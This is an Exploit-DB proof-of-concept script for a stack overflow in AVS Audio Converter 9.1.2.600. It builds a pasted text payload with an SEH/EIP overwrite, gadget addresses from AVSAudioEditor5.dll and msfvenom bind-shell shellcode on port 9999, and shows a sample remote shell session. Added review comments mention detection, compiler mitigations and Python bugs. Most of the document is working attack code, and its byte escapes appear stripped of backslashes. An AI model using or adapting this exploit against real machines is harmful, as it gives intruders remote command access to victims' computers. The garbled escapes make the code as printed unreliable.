
AVS Audio Converter 9.1.2.600 – Stack Overflow (PoC)



# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
# Date: 2019-12-28
# Exploit Author: boku
# Original DoS: https://www.exploit-db.com/exploits/47788
# Original DoS Author: ZwX
# Software Vendor: http://www.avs4you.com/
# Software Link: http://www.avs4you.com/avs-audio-converter.aspx
# Version: 9.1.2.600
# Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363
#            Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601

#!/usr/bin/python
# Recreate:
#   1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux.
#   2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy.
#   3) Install & Open AVS Audio Converter 9.1.2.600.
#   4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window.
#   5) Paste the copied payload from the 'bind9999.txt' file into the textbox.
#   6) Click the 'Browse...' button; to the right of the textbox.
#      - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces.
# Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape
# Builds the crafted string described in the header and writes it to a local text file.
# On the machine that runs this script the only effect is that single file write
# (open/write/close at the bottom); everything else is the author's explanation of
# how the bytes are laid out for the target process.
# NOTE(review): every '\x..' escape in this listing appears with its backslash
# stripped (e.g. 'x41'), most likely a page-extraction artifact, so the strings
# as printed are plain ASCII and the byte offsets quoted in the comments below
# assume the original escaped form.
# Detection angle (from the author's own description above): the observable on the
# affected host is AVSAudioConverter.exe opening a TCP listener on port 9999 on all
# interfaces after text is pasted into the 'Output Folder:' box -- a desktop media
# converter has no business listening on the network.
blt = '33[92m[33[0m+33[92m]33[0m ' # bash green success bullet (ANSI colour codes; ESC prefix missing in this rendering)
err = '33[91m[33[0m!33[91m]33[0m ' # bash red   error   bullet
File = 'bind9999.txt' # output file name; encodes the listener port used by the msfvenom payload below
try:
    # 0x00400000 [AVSAudioConverter.exe]
    #   9.1.2.600 (C:Program Files (x86)AVS4YOUAVSAudioConverterAVSAudioConverter.exe)
    #   - The only module that has SafeSEH disabled.
    #   Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll |
    #   0x00400000 | 0x00f33000 | False  | False   | False |  False   | False  |
    #   Mitigation note: the whole technique rests on SafeSEH, ASLR and NXCompat being
    #   off for this executable and (further down) for AVSAudioEditor5.dll. Shipping
    #   both linked with /SAFESEH, /DYNAMICBASE and /NXCOMPAT would remove the fixed
    #   addresses used below and the non-DEP stack that the 'jmp esp' step relies on.
    #   - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown.
    offEdx  = 'x41'*260
    edx     = 'x42x42x42x42' # EDX overwrite at 260 bytes. EDX=0x42424242
    # SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed.
    nSEH    = 'x42'*4
    SEH     = 'x43'*4
    # - If address at offset 308 is not readable, then the program will throw an exception at:
    #   75F9ECE7    3806            cmp byte ptr ds:[esi], al
    #   [!] Access violation when reading [esi]
    # - If we can get past this exception, we can overwrite EIP at offset 304.
    # - [esi] must be successfully overwriten so we can put our payload after it.
    offEip  = 'x45'*32
    # - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled.
    # - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump
    #    to it with a vanilla EIP overwrite; due to overwriting a return address on the stack.
    # - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite:
    #   ECX=0018FA60  ESP=0018FA60 (Stack locations will vary)
    #        0018FA54   45454545  EEEE // [296]
    #        0018FA58   45454545  EEEE // [300]
    #        0018FA5C   1006563E  V... // [304] eip var # Pointer to 'pop+ret'
    #       *0018FA60   00000000  .... // [308] esi var # our esi address gets replaced by 4 nulls
    #        0018FA64   1006A438  8... // [312] jmpEsp var # Pointer to 'jmp esp'
    #        0018FA68   E510EC10  .... // [316] fixStack var # ASM to fix the Stack so shellcode will work
    # [AVSAudioEditor5.dll] (C:Program Files (x86)Common FilesAVSMediaActiveXAVSAudioEditor5.dll)
    #   Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll |
    #   0x10000000 | 0x100a1000 | False  | True    | False |  False   | False  |
    # 0x1006563e : pop esi # ret  | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
    eip      = 'x3ex56x06x10' # pop+ret
    # - After pop+ret, ESP=0018FA68
    esi      = 'x10x10x08x10' # [AVSAudioEditor5.dll] | .data | RW
    #   0x1006a438 : jmp esp |  {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
    # - the esi var address is just a random, readable memory location that will not move; to bypass the exception.
    jmpEsp   = 'x38xa4x06x10' # jmp esp pointer
    # EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly.
    fixStack = 'x83xECx10'     # sub esp, 0x10
    fixStack += 'x89xE5'        # mov ebp, esp
    fixStack += 'x83xECx60'    # sub esp, 0x60
    #msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b 'x00' --format python
    # x86/shikata_ga_nai succeeded with size 355 (iteration=0)
    # Python 2 only: b"" is an ordinary str there, so it concatenates with the str
    # fragments above. Under Python 3 the '+' on the payload line raises TypeError,
    # which the bare except at the bottom would silently report as 'failed to create'.
    shellcode =  b""
    shellcode += b"xbexd8x49x8dx72xd9xe5xd9x74x24xf4"
    shellcode += b"x5ax31xc9xb1x53x31x72x12x83xeaxfc"
    shellcode += b"x03xaax47x6fx87xb6xb0xedx68x46x41"
    shellcode += b"x92xe1xa3x70x92x96xa0x23x22xdcxe4"
    shellcode += b"xcfxc9xb0x1cx5bxbfx1cx13xecx0ax7b"
    shellcode += b"x1axedx27xbfx3dx6dx3axecx9dx4cxf5"
    shellcode += b"xe1xdcx89xe8x08x8cx42x66xbex20xe6"
    shellcode += b"x32x03xcbxb4xd3x03x28x0cxd5x22xff"
    shellcode += b"x06x8cxe4xfexcbxa4xacx18x0fx80x67"
    shellcode += b"x93xfbx7ex76x75x32x7exd5xb8xfax8d"
    shellcode += b"x27xfdx3dx6ex52xf7x3dx13x65xccx3c"
    shellcode += b"xcfxe0xd6xe7x84x53x32x19x48x05xb1"
    shellcode += b"x15x25x41x9dx39xb8x86x96x46x31x29"
    shellcode += b"x78xcfx01x0ex5cx8bxd2x2fxc5x71xb4"
    shellcode += b"x50x15xdax69xf5x5exf7x7ex84x3dx90"
    shellcode += b"xb3xa5xbdx60xdcxbexcex52x43x15x58"
    shellcode += b"xdfx0cxb3x9fx20x27x03x0fxdfxc8x74"
    shellcode += b"x06x24x9cx24x30x8dx9dxaexc0x32x48"
    shellcode += b"x5axc8x95x23x79x35x65x94x3dx95x0e"
    shellcode += b"xfexb1xcax2fx01x18x63xc7xfcxa3xac"
    shellcode += b"x17x88x42xd8x37xdcxddx74xfax3bxd6"
    shellcode += b"xe3x05x6ex4ex83x4ex78x49xacx4exae"
    shellcode += b"xfdx3axc5xbdx39x5bxdaxebx69x0cx4d"
    shellcode += b"x61xf8x7fxefx76xd1x17x8cxe5xbexe7"
    shellcode += b"xdbx15x69xb0x8cxe8x60x54x21x52xdb"
    shellcode += b"x4axb8x02x24xcex67xf7xabxcfxeax43"
    shellcode += b"x88xdfx32x4bx94x8bxeax1ax42x65x4d"
    shellcode += b"xf5x24xdfx07xaaxeexb7xdex80x30xc1"
    shellcode += b"xdexccxc6x2dx6exb9x9ex52x5fx2dx17"
    shellcode += b"x2bxbdxcdxd8xe6x05xfdx92xaax2cx96"
    shellcode += b"x7ax3fx6dxfbx7cxeaxb2x02xffx1ex4b"
    shellcode += b"xf1x1fx6bx4exbdxa7x80x22xaex4dxa6"
    shellcode += b"x91xcfx47"
    # Concatenation order defines the byte offsets listed on the next line.
    payload  = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode
    # offsets: 0      260 264  268 272    304 308 312    316      324
    # Text-mode open without a context manager: if write() raises, the handle is
    # not closed explicitly and control falls straight into the bare except.
    f       = open(File, 'w') # open file for write
    f.write(payload)
    f.close() # close the file
    print blt + File + " created successfully " # Python 2 print statement
#   root@kali# nc  9999
#   Microsoft Windows [Version 6.1.7601]
#   C:Program Files (x86)AVS4YOUAVSAudioConverter>
except:
    # Bare except: swallows every exception type (permission errors, the Python 3
    # TypeError noted above, even KeyboardInterrupt) and hides the real cause.
    print err + File + ' failed to create'
            





https://www.exploit-db.com/exploits/47810
